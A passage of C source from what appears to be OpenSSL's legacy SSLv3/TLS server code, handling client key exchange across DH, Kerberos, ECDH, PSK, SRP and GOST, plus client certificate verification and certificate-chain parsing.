dh_clnt = EVP_PKEY_get1_DH(clkey);
}
if (dh_clnt == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
EVP_PKEY_free(clkey);
pub = dh_clnt->pub_key;
}
else
pub=BN_bin2bn(p,i,NULL);
if (pub == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BN_LIB);
goto err;
}
i=DH_compute_key(p,pub,dh_srvr);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
BN_clear_free(pub);
goto err;
}
DH_free(s->s3->tmp.dh);
s->s3->tmp.dh=NULL;
if (dh_clnt)
DH_free(dh_clnt);
else
BN_clear_free(pub);
pub=NULL;
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,p,i);
OPENSSL_cleanse(p,i);
if (dh_clnt)
return 2;
}
else
#endif
#ifndef OPENSSL_NO_KRB5
if (alg_k & SSL_kKRB5)
{
krb5_error_code krb5rc;
krb5_data enc_ticket;
krb5_data authenticator;
krb5_data enc_pms;
KSSL_CTX *kssl_ctx = s->kssl_ctx;
EVP_CIPHER_CTX ciph_ctx;
const EVP_CIPHER *enc = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char pms[SSL_MAX_MASTER_KEY_LENGTH
+ EVP_MAX_BLOCK_LENGTH];
int padl, outl;
krb5_timestamp authtime = 0;
krb5_ticket_times ttimes;
EVP_CIPHER_CTX_init(&ciph_ctx);
if (!kssl_ctx) kssl_ctx = kssl_ctx_new();
n2s(p,i);
enc_ticket.length = i;
if (n < (long)(enc_ticket.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
enc_ticket.data = (char *)p;
p+=enc_ticket.length;
n2s(p,i);
authenticator.length = i;
if (n < (long)(enc_ticket.length + authenticator.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
authenticator.data = (char *)p;
p+=authenticator.length;
n2s(p,i);
enc_pms.length = i;
enc_pms.data = (char *)p;
p+=enc_pms.length;
/* Note that the length is checked again below,
** after decryption
*/
if(enc_pms.length > sizeof pms)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (n != (long)(enc_ticket.length + authenticator.length +
enc_pms.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if ((krb5rc = kssl_sget_tkt(kssl_ctx, &enc_ticket, &ttimes,
&kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_sget_tkt rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
/* Note: a missing authenticator is not considered an error,
** but it results in authtime == 0.
*/
if ((krb5rc = kssl_check_authent(kssl_ctx, &authenticator,
&authtime, &kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_check_authent rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
if ((krb5rc = kssl_validate_times(authtime, &ttimes)) != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, krb5rc);
goto err;
}
#ifdef KSSL_DEBUG
kssl_ctx_show(kssl_ctx);
#endif /* KSSL_DEBUG */
enc = kssl_map_enc(kssl_ctx->enctype);
if (enc == NULL)
goto err;
memset(iv, 0, sizeof iv); /* per RFC 1510 */
if (!EVP_DecryptInit_ex(&ciph_ctx,enc,NULL,kssl_ctx->key,iv))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (!EVP_DecryptUpdate(&ciph_ctx, pms,&outl,
(unsigned char *)enc_pms.data, enc_pms.length))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!EVP_DecryptFinal_ex(&ciph_ctx,&(pms[outl]),&padl))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
outl += padl;
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!((pms[0] == (s->client_version>>8)) && (pms[1] == (s->client_version & 0xff))))
{
/* The premaster secret must contain the same version number as the
* ClientHello to detect version rollback attacks (strangely, the
* protocol does not offer such protection for DH ciphersuites).
* However, buggy clients exist that send random bytes instead of
* the protocol version.
* If SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients.
* (Perhaps we should have a separate BUG value for the Kerberos cipher)
*/
if (!(s->options & SSL_OP_TLS_ROLLBACK_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_AD_DECODE_ERROR);
goto err;
}
}
EVP_CIPHER_CTX_cleanup(&ciph_ctx);
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, pms, outl);
if (kssl_ctx->client_princ)
{
size_t len = strlen(kssl_ctx->client_princ);
if ( len < SSL_MAX_KRB5_PRINCIPAL_LENGTH )
{
s->session->krb5_client_princ_len = len;
memcpy(s->session->krb5_client_princ,kssl_ctx->client_princ,len);
}
}
/*- Was doing kssl_ctx_free() here,
* but it caused problems for apache.
* kssl_ctx = kssl_ctx_free(kssl_ctx);
* if (s->kssl_ctx) s->kssl_ctx = NULL;
*/
}
else
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
if (alg_k & (SSL_kECDHE|SSL_kECDHr|SSL_kECDHe))
{
int ret = 1;
int field_size = 0;
const EC_KEY *tkey;
const EC_GROUP *group;
const BIGNUM *priv_key;
/* initialize structures for server's ECDH key pair */
if ((srvr_ecdh = EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Let's get server private key and group information */
if (alg_k & (SSL_kECDHr|SSL_kECDHe))
{
/* use the certificate */
tkey = s->cert->pkeys[SSL_PKEY_ECC].privatekey->pkey.ec;
}
else
{
/* use the ephemeral values we saved when
* generating the ServerKeyExchange msg.
*/
tkey = s->s3->tmp.ecdh;
}
group = EC_KEY_get0_group(tkey);
priv_key = EC_KEY_get0_private_key(tkey);
if (!EC_KEY_set_group(srvr_ecdh, group) ||
!EC_KEY_set_private_key(srvr_ecdh, priv_key))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* Let's get client's public key */
if ((clnt_ecpoint = EC_POINT_new(group)) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if (n == 0L)
{
/* Client public key was in the client certificate */
if (alg_k & SSL_kECDHE)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (((clnt_pub_pkey=X509_get_pubkey(s->session->peer))
== NULL) ||
(clnt_pub_pkey->type != EVP_PKEY_EC))
{
/* XXX: For now, we do not support client
* authentication using ECDH certificates
* so this branch (n == 0L) of the code is
* never executed. When that support is
* added, we ought to ensure the key
* received in the certificate is
* authorized for key agreement.
* ECDH_compute_key implicitly checks that
* the two ECDH shares are for the same
* group.
*/
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNABLE_TO_DECODE_ECDH_CERTS);
goto f_err;
}
if (EC_POINT_copy(clnt_ecpoint,
EC_KEY_get0_public_key(clnt_pub_pkey->pkey.ec)) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
ret = 2; /* Skip certificate verify processing */
}
else
{
/* Get client's public key from encoded point
* in the ClientKeyExchange message.
*/
if ((bn_ctx = BN_CTX_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Get encoded point length */
i = *p;
p += 1;
if (n != 1 + i)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
if (EC_POINT_oct2point(group,
clnt_ecpoint, p, i, bn_ctx) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* p is pointing to somewhere in the buffer
* currently, so set it to the start
*/
p=(unsigned char *)s->init_buf->data;
}
/* Compute the shared pre-master secret */
field_size = EC_GROUP_get_degree(group);
if (field_size <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
i = ECDH_compute_key(p, (field_size+7)/8, clnt_ecpoint, srvr_ecdh, NULL);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
EC_KEY_free(s->s3->tmp.ecdh);
s->s3->tmp.ecdh = NULL;
/* Compute the master secret */
s->session->master_key_length = s->method->ssl3_enc-> \
generate_master_secret(s, s->session->master_key, p, i);
OPENSSL_cleanse(p, i);
return (ret);
}
else
#endif
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
unsigned char *t = NULL;
unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN*2+4];
unsigned int pre_ms_len = 0, psk_len = 0;
int psk_err = 1;
char tmp_id[PSK_MAX_IDENTITY_LEN+1];
al=SSL_AD_HANDSHAKE_FAILURE;
n2s(p,i);
if (n != i+2)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_LENGTH_MISMATCH);
goto psk_err;
}
if (i > PSK_MAX_IDENTITY_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto psk_err;
}
if (s->psk_server_callback == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_NO_SERVER_CB);
goto psk_err;
}
/* Create guaranteed NULL-terminated identity
* string for the callback */
memcpy(tmp_id, p, i);
memset(tmp_id+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
psk_len = s->psk_server_callback(s, tmp_id,
psk_or_pre_ms, sizeof(psk_or_pre_ms));
OPENSSL_cleanse(tmp_id, PSK_MAX_IDENTITY_LEN+1);
if (psk_len > PSK_MAX_PSK_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
else if (psk_len == 0)
{
/* PSK related to the given identity not found */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_IDENTITY_NOT_FOUND);
al=SSL_AD_UNKNOWN_PSK_IDENTITY;
goto psk_err;
}
/* create PSK pre_master_secret */
pre_ms_len=2+psk_len+2+psk_len;
t = psk_or_pre_ms;
memmove(psk_or_pre_ms+psk_len+4, psk_or_pre_ms, psk_len);
s2n(psk_len, t);
memset(t, 0, psk_len);
t+=psk_len;
s2n(psk_len, t);
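/* The resulting pre_master_secret follows the plain-PSK layout of
* RFC 4279: a 2-byte length N, N zero octets ("other_secret"),
* a 2-byte PSK length, and finally the PSK itself (moved into
* place by the memmove above).
*/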
if (s->session->psk_identity != NULL)
OPENSSL_free(s->session->psk_identity);
s->session->psk_identity = BUF_strdup((char *)p);
if (s->session->psk_identity == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
if (s->session->psk_identity_hint != NULL)
OPENSSL_free(s->session->psk_identity_hint);
s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
if (s->ctx->psk_identity_hint != NULL &&
s->session->psk_identity_hint == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, psk_or_pre_ms, pre_ms_len);
psk_err = 0;
psk_err:
OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_err != 0)
goto f_err;
}
else
#endif
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
int param_len;
n2s(p,i);
param_len=i+2;
if (param_len > n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_A_LENGTH);
goto f_err;
}
if (!(s->srp_ctx.A=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
if (BN_ucmp(s->srp_ctx.A, s->srp_ctx.N) >= 0
|| BN_is_zero(s->srp_ctx.A))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
if (s->session->srp_username != NULL)
OPENSSL_free(s->session->srp_username);
s->session->srp_username = BUF_strdup(s->srp_ctx.login);
if (s->session->srp_username == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if ((s->session->master_key_length = SRP_generate_server_master_secret(s,s->session->master_key))<0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
p+=i;
}
else
#endif /* OPENSSL_NO_SRP */
if (alg_k & SSL_kGOST)
{
int ret = 0;
EVP_PKEY_CTX *pkey_ctx;
EVP_PKEY *client_pub_pkey = NULL, *pk = NULL;
unsigned char premaster_secret[32], *start;
size_t outlen=32, inlen;
unsigned long alg_a;
int Ttag, Tclass;
long Tlen;
/* Get our certificate private key*/
alg_a = s->s3->tmp.new_cipher->algorithm_auth;
if (alg_a & SSL_aGOST94)
pk = s->cert->pkeys[SSL_PKEY_GOST94].privatekey;
else if (alg_a & SSL_aGOST01)
pk = s->cert->pkeys[SSL_PKEY_GOST01].privatekey;
pkey_ctx = EVP_PKEY_CTX_new(pk,NULL);
EVP_PKEY_decrypt_init(pkey_ctx);
/* If client certificate is present and is of the same type, maybe
* use it for key exchange. Don't mind errors from
* EVP_PKEY_derive_set_peer, because it is completely valid to use
* a client certificate for authorization only. */
client_pub_pkey = X509_get_pubkey(s->session->peer);
if (client_pub_pkey)
{
if (EVP_PKEY_derive_set_peer(pkey_ctx, client_pub_pkey) <= 0)
ERR_clear_error();
}
/* Decrypt session key */
if (ASN1_get_object((const unsigned char **)&p, &Tlen, &Ttag, &Tclass, n) != V_ASN1_CONSTRUCTED ||
Ttag != V_ASN1_SEQUENCE ||
Tclass != V_ASN1_UNIVERSAL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
start = p;
inlen = Tlen;
if (EVP_PKEY_decrypt(pkey_ctx,premaster_secret,&outlen,start,inlen) <=0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
/* Generate master secret */
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,premaster_secret,32);
/* Check if pubkey from client certificate was used */
if (EVP_PKEY_CTX_ctrl(pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
ret = 2;
else
ret = 1;
gerr:
EVP_PKEY_free(client_pub_pkey);
EVP_PKEY_CTX_free(pkey_ctx);
if (ret)
return ret;
else
goto err;
}
else
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNKNOWN_CIPHER_TYPE);
goto f_err;
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
#if !defined(OPENSSL_NO_DH) || !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_ECDH) || defined(OPENSSL_NO_SRP)
err:
#endif
#ifndef OPENSSL_NO_ECDH
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
if (srvr_ecdh != NULL)
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
#endif
return(-1);
}
int ssl3_get_cert_verify(SSL *s)
{
EVP_PKEY *pkey=NULL;
unsigned char *p;
int al,ok,ret=0;
long n;
int type=0,i,j;
X509 *peer;
const EVP_MD *md = NULL;
EVP_MD_CTX mctx;
EVP_MD_CTX_init(&mctx);
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_VRFY_A,
SSL3_ST_SR_CERT_VRFY_B,
-1,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
if (s->session->peer != NULL)
{
peer=s->session->peer;
pkey=X509_get_pubkey(peer);
type=X509_certificate_type(peer,pkey);
}
else
{
peer=NULL;
pkey=NULL;
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY)
{
s->s3->tmp.reuse_message=1;
if ((peer != NULL) && (type & EVP_PKT_SIGN))
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_MISSING_VERIFY_MESSAGE);
goto f_err;
}
ret=1;
goto end;
}
if (peer == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_NO_CLIENT_CERT_RECEIVED);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
if (!(type & EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
al=SSL_AD_ILLEGAL_PARAMETER;
goto f_err;
}
if (s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_CCS_RECEIVED_EARLY);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
/* we now have a signature that we need to verify */
p=(unsigned char *)s->init_msg;
/* Check for broken implementations of GOST ciphersuites */
/* If the key is GOST and n is exactly 64, it is a bare
* signature without a length field */
if (n==64 && (pkey->type==NID_id_GostR3410_94 ||
pkey->type == NID_id_GostR3410_2001) )
{
i=64;
}
else
{
if (SSL_USE_SIGALGS(s))
{
int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
{
al = SSL_AD_INTERNAL_ERROR;
goto f_err;
}
else if (rv == 0)
{
al = SSL_AD_DECODE_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
n2s(p,i);
n-=2;
if (i > n)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_LENGTH_MISMATCH);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
}
j=EVP_PKEY_size(pkey);
if ((i > j) || (n > j) || (n <= 0))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_WRONG_SIGNATURE_SIZE);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
if (hdatalen <= 0)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_VerifyInit_ex(&mctx, md, NULL)
|| !EVP_VerifyUpdate(&mctx, hdata, hdatalen))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
if (EVP_VerifyFinal(&mctx, p , i, pkey) <= 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
i=RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH, p, i,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
j=DSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.dsa);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_DSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
j=ECDSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.ec);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{ unsigned char signature[64];
int idx;
EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_verify_init(pctx);
if (i!=64) {
fprintf(stderr,"GOST signature length is %d",i);
}
for (idx=0;idx<64;idx++) {
signature[63-idx]=p[idx];
}
j=EVP_PKEY_verify(pctx,signature,64,s->s3->tmp.cert_verify_md,32);
EVP_PKEY_CTX_free(pctx);
if (j<=0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,ERR_R_INTERNAL_ERROR);
al=SSL_AD_UNSUPPORTED_CERTIFICATE;
goto f_err;
}
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
end:
if (s->s3->handshake_buffer)
{
BIO_free(s->s3->handshake_buffer);
s->s3->handshake_buffer = NULL;
s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_free(pkey);
return(ret);
}
int ssl3_get_client_certificate(SSL *s)
{
int i,ok,al,ret= -1;
X509 *x=NULL;
unsigned long l,nc,llen,n;
const unsigned char *p,*q;
unsigned char *d;
STACK_OF(X509) *sk=NULL;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_A,
SSL3_ST_SR_CERT_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if (s->s3->tmp.message_type == SSL3_MT_CLIENT_KEY_EXCHANGE)
{
if ( (s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* If TLS asked for a client cert, the client must return a 0-length list */
if ((s->version > SSL3_VERSION) && s->s3->tmp.cert_request)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
s->s3->tmp.reuse_message=1;
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_WRONG_MESSAGE_TYPE);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
if ((sk=sk_X509_new_null()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
n2l3(p,llen);
if (llen+3 != n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
for (nc=0; nc<llen; )
{
n2l3(p,l);
if ((l+nc+3) > llen)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
q=p;
x=d2i_X509(NULL,&p,l);
if (x == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_ASN1_LIB);
goto err;
}
if (p != (q+l))
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
if (!sk_X509_push(sk,x))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
x=NULL;
nc+=l+3;
}
if (sk_X509_num(sk) <= 0)
{
/* TLS does not mind 0 certs returned */
if (s->version == SSL3_VERSION)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_NO_CERTIFICATES_RETURNED);
goto f_err;
}
/* Fail for TLS only if we required a certificate */
else if ((s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* No client certificate so digest cached records */
if (s->s3->handshake_buffer && !ssl3_digest_cached_records(s))
{
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
}
else
{
EVP_PKEY *pkey;
i=ssl_verify_cert_chain(s,sk);
if (i <= 0)
{
al=ssl_verify_alarm_type(s->verify_result);
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERTIFICATE_VERIFY_FAILED);
goto f_err;
}
if (i > 1)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, i);
al = SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
pkey = X509_get_pubkey(sk_X509_value(sk, 0));
if (pkey == NULL)
{
al=SSL3_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
SSL_R_UNKNOWN_CERTIFICATE_TYPE);
goto f_err;
}
EVP_PKEY_free(pkey);
}
if (s->session->peer != NULL) /* This should not be needed */
X509_free(s->session->peer);
s->session->peer=sk_X509_shift(sk);
s->session->verify_result = s->verify_result;
/* With the current implementation, sess_cert will always be NULL
* when we arrive here. */
if (s->session->sess_cert == NULL)
{
s->session->sess_cert = ssl_sess_cert_new();
if (s->session->sess_cert == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
goto err;
}
}
if (s->session->sess_cert->cert_chain != NULL)
sk_X509_pop_free(s->session->sess_cert->cert_chain, X509_free);
s->session->sess_cert->cert_chain=sk;
